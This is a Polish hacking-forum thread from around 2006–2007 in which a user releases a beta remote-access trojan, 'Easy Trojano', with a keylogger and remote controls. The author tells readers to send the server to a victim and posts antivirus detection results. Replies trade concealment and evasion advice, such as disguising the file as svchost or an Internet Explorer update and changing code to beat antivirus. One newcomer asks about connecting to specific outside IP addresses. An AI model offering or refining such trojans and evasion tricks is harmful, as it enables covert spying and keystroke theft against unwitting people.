Easy Trojano >>BETA<<

[Dark Smark]

Witam!
Chce przedstawić mój pierszy tego typu projekt (pierwszy napisany w OP).
Easy Trojano jest narazie wmiare prostym programem więc porosze o wyrozumiałość...

Easy Trojano beta 0.3
Trojan działający na lan.
Funkcje:
-otwórz cd / zamknij cd
-odegraj dzwięk beep
-wyloguj komputer bez pytania
-wyswietl podany komunikat
-włącz / wyłącz monitor
-wbudowany keylogger
-Mysz Lewo/Prawo Ręczna
-Dodano przycisk "U" ktory ukrywa server

Jest to wersja beta więc ulegnie rozbudowie

Używanie: Server przesyłamy ofiarze i klientem sterujemy komputerem ofiary...
Aby testować na swoim komputerze trzeba wiedzieć jak usuwać
Easy Trojano beta 0.3
Aby usunąć easy trojano należy:
-wciśnij alt+ctrl+del wejdz w procesy kliknij ctfnon.exe i kliknij zabij proces (trojan wyłączony)
-następnie usuwamy autorun
wchodzimy w start > uruchom > wpisujemy 'msconfig'
wchodzimy w zakładke uruchamiane
i odznaczamy upade klikamy ok
-teraz usuwamy trojana z systemu trojan jest w lokacj Crogram Filesupade.exe wystarczy go usunąć z tej lokacji....
Więcej w pliku .txt dołączonym do trojana... [/b]

Wykrywalność z dnia 20.12.2006

AntiVir
Found HEUR/Malware
ArcaVir
Found nothing
Avast
Found nothing
AVG Antivirus
Found nothing
BitDefender
Found nothing
ClamAV
Found nothing
Dr.Web
Found nothing
F-Prot Antivirus
Found nothing
F-Secure Anti-Virus
Found nothing
Fortinet
Found nothing
Kaspersky Anti-Virus
Found nothing
NOD32
Found probably unknown NewHeur_PE (probable variant)
Norman Virus Control
Found nothing
VirusBuster
Found nothing
VBA32
Found Malware.Delf.47 (probable variant)
[/b]

POBIERZ
alternatywny link

 

[boness]

-pokaz komunikat systemowy: wyskakuje okienko z nazwa procesu, przez co latwo mozna go znalesc...

-keylogger: log malo czytelny, dopiero po wylaczeniu keyloggera jest napisany widocznym kolorem... no i oczywiscie KeySpy, prawie same klikniecia...

-trojan: samo ukrycie tez nie bardzo pasuje... w program files ikonka wogole nie pasuje do reszty, od razu widac ze cos nie tak

grafika: prosta, ale pasuje xD

tyle odemnie, pozdro...

 

[Kanciastoporty]

ja bym proponowal wrzucac zamiast do program files to do windowsa

z jakas podchwytiwa nazwa ( moze byc svchost zeby sie nie rzucal w oczy w menedzerze)
pozdrawiam

 

[FDJ]

Brawo DarkSmark chodz ten keyspy przeraza

 

[TripleX]

Nie bedziemy sie czepiac.raczej pogratulujemy pierwszego projektu Tylko wywal te kliki z logow bo ku****y idzie dostać

Aaaa..ŁAdną przejżystą grafike zrobiłeś

 

[Dark Smark]

Tylko jak zakładam hooka i blokuje rejestracje klikniec myszy...
to baaaaaaardzo spowalnia przy starcie i ofiara sie skapnie ze cos nietak...
naszczęście to dopiero beta


Dziękuje za wszystkie uwagi, spróbuje ulepszyć,naprawić/poprawić kolejne wersje...



///??

-keylogger: log malo czytelny, dopiero po wylaczeniu keyloggera jest napisany widocznym kolorem... no i oczywiscie KeySpy, prawie same klikniecia...[/b]

Log jest tak słabo widoczny bo koloru nieda się zmienić w zablokowanym memo...
Da się zrobić żeby niedało się edytować memo a żeby kolor działał...?? (delphi)?

PS : Niepisałem go metodą kopiuj, wklej... pisałem rozumiąc kodzik

 

[Avat]

To jest napisane w Delphi? Bo jeśli tak, to możesz założyć hooka i nie będzie rejestrował kliknięć myszy, tylko litery i "|" zamiast znaków specjalnych. W Memo wtedy wszystko jest pisane CapsLockiem, ale w pliku są litery właściwej wielkości (uwzględniane są duże).

Klik

 

[12345qq]

Sorry, ty tego nie pisałeś. :no:
A już napewno nie samemu.

Trojan działający na lan.[/b]

Brak podstawowej znajomosci tcp/ip.
Powinno być client<>server.

-otwórz cd / zamknij cd
-odegraj dzwięk beep
-wyloguj komputer bez pytania
-wyswietl podany komunikat
-włącz / wyłącz monitor
-wbudowany keylogger
-Mysz Lewo/Prawo Ręczna[/b]

Przydatne jak cholera.

-Dodano przycisk "U" ktory ukrywa server[/b]

Dodaje atrybut hidden? Bo rootkita w twoim wykonaniu sobie nie wyobrażam.

-wciśnij alt+ctrl+del wejdz w procesy kliknij ctfnon.exe i kliknij zabij proces (trojan wyłączony)
-następnie usuwamy autorun
wchodzimy w start > uruchom > wpisujemy 'msconfig'[/b]

Ja potrafie to z poziomu .bat zablokować, a ty sobie nie poradziłeś w delphi czy c.

Crogram Filesupade.exe[/b]

Plecam %programfiles%internet explorerupdate.exe, z ikonką IE. Prawie nikt tam nawet nie zajrzy ;]

Nie będe tego ściągał, bo poprostu nie warto.



PS: Do lanu już jest trojan. Niewykrywalny, szybki, autorstwa microsoftu.... A zwie sie telnet. Uruchamia sie go 3-5 poleceniami.

 

[Dark Smark]

:| pochwal się swoim...
xD jagbyś tylko przeczytał że to beta, beta ma na celu sprawdzenia działania pod względem błędów...
Nie blokowałem alt+ctrl+del, bo do testów niebęde co chwile odblokowywał...

Powinno być client<>server.[/b]

A jak jest? :|

Do momentu jak nie zostanie wydana "Finalna wersja" to niebędzie dobrego ukrycia i uniemożliwienia usunięcia... ;]

 

[Szalony Kojot]

12345qq
Easy Trojano beta 0.3
Jakbyś nie zauważył w nazwie jest beta ;]
Jak Ci się coś nie podoba 12345qq (lol2 boski nick) to wywalaj z tego forum!!
Kolejny 12-latek, który mysli że coś umie i uważa się za hackera ;] <lol2>
Boshe zmiłuj się... Daj mi nerwy

Dark Smark
Gratuluję projektu !! Świetny

12345qq
PostWysłany: 23-12-2006, 04:40 Temat postu:
Sorry, ty tego nie pisałeś. :no:
A już napewno nie samemu.[/b]

@up- skąd wiesz ;] ??;/

I nie obrażaj użytkowników forum :]

 

[Kornik52]

Brawo ! jak będziesz ulepszał to może coś fajnego zrobisz

 

[Maniex]

Jestem pod wrazeniem

nie jest najlepszy ale sądze ze nowa wersja będzie fajna ;] czekam na nowa wersje

 

[Mikael]

Hej jestem tu nowy i troche jestem zielony w tych trojanach

ale kazdy pewnie mial trudne początki mam pytanie dlaczego jak chce sie połączyc to wyskakuje error ??

 

[Dark Smark]

Mikael
1) Wysłałeś server koleś odpala (firewall nieblokuje)
2) Z Kim się Łączysz? (lan czy ip zew/wew?


Jak testujesz na własnym kompie to odpalasz i w miejsce ip wpisujesz:
127.0.01

 

[Mikael]

chce tak zrobic z kumplem co ma Ip zew jak tez mam zew

[ Dodano: 04-01-2007, 22:56 ]
a czy da sie polaczyc z numerami takimi jak

-81.219.99.252
-88.199.75.19

itd...??

 

[Kanciastoporty]

po pierwsze, to ty szalony kojocie, obrazasz tego goscia (niby dlaczego ma wywalac z tego forum? troche krytyki sie przyda. Fakt ze troche za duzo polecialo ze strony 12345qq'a, ale to nie powod zeby go uwazac za 12 latka np.)
a po drugie to pisalem juz w tym topicu, ale dopiero teraz testowalem tego trojana i z przykroscia musze stwierdzic ze nie dziala (nie moge sie polaczyc)
i jeszcze pytanko: nie bede udawal, nie znam sie na pisaniu trojanow. Czy wpis w rejestrze jest odpowiedzialny tylko za odpalanie ze startem windowsa czy jest tez potrzebny do dzialania programu? Wydaje mi sie ze raczej to pierwsze, ale chce sie upewnic.
pozdrawiam
//edit
juz dziala :mruga: nie wiem dlaczego wczesniej nie dzialalo (puszczalem firewallem a i tak nie chcial sie polaczyc, no ale teraz smiga

)
chcialbym tez na koncu goraca pogratulowac dobrej roboty

 

[Dark Smark]

Kanciastoporty powinien jak fw "pozwoliłeś" tez dzialac...
Trojan dodaje sie do autostartu i po wlacyeniu systemu znowu sie odpala Z Lokacji podanej na samej gorze tematu...

W wersji finalnej zostanie napewno poprawiony:
[+] Keylogger (niebedzie rejestrowal myszki, pokazuje godzine i nazwe aplikacji)
[+] Będzie ukryty gdzieś w systemie (dla ułatwionego testowania jest tak błacha lokacja)
[+] Otwieranie podanej strony na komputerze ofiary
[może] CMD



Jest to trojan ale najbardziej ma się skupiać na ZABAWIE i KEYLOGGER'ze

 

[Kanciastoporty]

no dziala dziala

chcialem jeszcze dodac ze coraz wiecej antywirow go wykrywa, przydalo by sie jakos kod zmienic albo cos

 

[FDJ]

Originally posted by Kanciastoporty
no dziala dziala

chcialem jeszcze dodac ze coraz wiecej antywirow go wykrywa, przydalo by sie jakos kod zmienic albo cos

Przeciez to jest 1 wersja ,a smark pracuje nad kolejnymi.

 

[Dark Smark]

Nowa wersja o nowej nazwie "Posejdon"
http://www.haker.com.pl/forum/viewtopic.php?p=139892#139892